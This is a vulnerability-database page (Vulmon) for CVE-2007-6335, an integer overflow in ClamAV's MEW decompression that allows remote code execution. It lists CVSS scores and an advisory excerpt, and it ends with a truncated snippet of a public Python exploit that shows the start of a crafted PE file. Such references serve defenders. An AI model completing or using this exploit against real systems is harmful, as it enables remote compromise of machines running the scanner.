Published: 20/12/2007 Updated: 29/09/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Integer overflow in libclamav in ClamAV prior to 0.92 allows remote malicious users to execute arbitrary code via a crafted MEW packed PE file, which triggers a heap-based buffer overflow.

Vulnerable Product	Search on Vulmon	Subscribe to Product
clam anti-virus clamav

Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-6335 It was discovered that an integer overflow in the decompression code for MEW archives may lead to the execution of arbitrary code CVE-2007-6336 It was dis ...

''' clamav-0912 exploit ( CVE-2007-6335 ) (c) Thomas Pollet thomaspollet@gmailcom we own dsize in read(desc, src + dsize, exe_sections[i + 1]rsz)) != exe_sections[i + 1]rsz) exploited with randomize_va_space = 0 ''' import struct exe=( "\x4d\x5a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4c\x01\x02\x00" "\x00\x00\x ...

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2007-6335

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect